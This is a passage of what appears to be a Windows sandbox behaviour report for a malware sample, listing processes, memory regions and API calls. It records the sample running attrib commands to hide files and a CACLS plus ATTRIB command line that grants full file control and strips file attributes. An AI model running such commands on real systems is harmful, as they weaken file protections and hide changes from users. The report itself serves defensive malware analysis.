\"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17922 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private 
name = "private_0x0000000000010000" filename = "" Region: id = 17923 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17924 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17925 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 17926 start_va = 0x5b0000 end_va = 0x5b6fff entry_point = 0x5b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17927 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17928 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17929 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17930 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 17931 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17932 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17933 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17934 start_va = 
0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17935 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 17936 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 17937 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 17938 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17939 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 17940 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17941 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17942 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 17943 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17944 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17945 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17946 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 17947 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17948 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17949 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 17950 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17951 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 264 os_tid = 0xa58 Process: id = "208" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
"child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17992 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 17993 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17994 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17995 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 17996 start_va = 0xbc0000 end_va = 0xbc6fff entry_point = 0xbc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 17997 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17998 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17999 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18000 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 18001 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18002 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18003 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18004 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18005 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 18006 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 18007 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18008 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18009 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18010 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = 
"lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18011 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18012 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18013 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18014 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18015 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18016 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18017 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18018 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18019 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" 
filename = "" Region: id = 18020 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18021 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 265 os_tid = 0xb5c Process: id = "209" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ee0" os_pid = "0x794" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "203" os_parent_pid = "0xac8" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18022 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18023 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18024 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18025 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 18026 start_va = 0xd20000 end_va = 0xd26fff entry_point = 0xd20000 region_type = 
mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 18027 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18028 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18029 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18030 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 18031 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 18032 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18033 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18034 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18035 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 18036 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 18037 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = 
"ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 18038 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18039 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18040 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18041 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18042 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18043 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18044 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18045 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18046 start_va = 0x773c0000 end_va = 0x773d8fff 
entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18047 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18048 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18049 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 18050 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18051 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 266 os_tid = 0xba0 Process: id = "210" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16dc0" os_pid = "0xb10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" 
[0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 18064 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 18065 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 18066 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 18067 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 18068 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 18069 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18070 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 18071 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 18072 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 18073 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 
18190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 18192 start_va = 0xa0000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 18193 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 18194 start_va = 0x310000 end_va = 0x376fff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 18196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 18198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18200 start_va = 0x76b40000 
end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 18202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 18204 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 18205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 18207 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 18208 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 18209 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 18210 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" 
Region: id = 18211 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 18212 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 18213 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 18214 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 267 os_tid = 0xbdc [0147.155] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff64 | out: lpSystemTimeAsFileTime=0x30ff64*(dwLowDateTime=0x91a540a0, dwHighDateTime=0x1d440a9)) [0147.155] GetCurrentProcessId () returned 0xb10 [0147.155] GetCurrentThreadId () returned 0xbdc [0147.155] GetTickCount () returned 0x2dbbe [0147.155] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff5c | out: lpPerformanceCount=0x30ff5c*=20394426980) returned 1 [0147.156] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0147.156] __set_app_type (_Type=0x1) [0147.156] __p__fmode () returned 0x76b331f4 [0147.156] __p__commode () returned 0x76b331fc [0147.156] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0147.156] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0147.156] GetCurrentThreadId () returned 0xbdc [0147.156] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbdc) returned 0x38 [0147.156] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0147.156] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 
0x769624c2 [0147.156] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.157] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.157] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fef4 | out: phkResult=0x30fef4*=0x0) returned 0x2 [0147.157] VirtualQuery (in: lpAddress=0x30ff2b, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fec4, dwLength=0x1c | out: lpBuffer=0x30fec4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.157] VirtualQuery (in: lpAddress=0x211000, 